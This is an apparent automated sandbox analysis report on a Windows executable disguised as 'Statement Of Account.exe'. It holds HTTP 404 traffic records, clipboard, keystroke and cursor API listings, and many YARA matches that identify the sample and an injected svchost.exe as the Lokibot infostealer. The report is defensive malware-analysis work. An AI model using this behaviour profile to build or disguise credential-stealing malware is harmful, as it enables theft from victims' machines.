Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:52:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046C5D0

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00459FFF
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_00459FFF

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046C5D0

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

0_2_00456354

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,		0_2_0047C08E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		3_2_0047C08E

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.Statement Of Account.exe.3a20000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 7.2.Statement Of Account.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,	0_2_0047C08E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004331D9 ClientToScreen,NtdllDialogWndProc_W,	0_2_004331D9
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0047E1FA NtdllDialogWndProc_W,	0_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0043323E NtdllDialogWndProc_W,	0_2_0043323E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0046F2B0 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0046F2B0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0046F50B NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_0046F50B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0045058D GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,	0_2_0045058D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00469681 PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_00469681
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0046F749 NtdllDialogWndProc_W,	0_2_0046F749
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00447870 GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,	0_2_00447870
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044782B NtdllDialogWndProc_W,	0_2_0044782B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044096A NtdllDialogWndProc_W,	0_2_0044096A
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044796B GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,	0_2_0044796B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00440938 NtdllDialogWndProc_W,	0_2_00440938
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00469995 NtdllDialogWndProc_W,NtdllDialogWndProc_W,	0_2_00469995
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0044099C NtdllDialogWndProc_W,	0_2_0044099C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00440ADF NtdllDialogWndProc_W,	0_2_00440ADF
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00447A87 SendMessageW,NtdllDialogWndProc_W,	0_2_00447A87
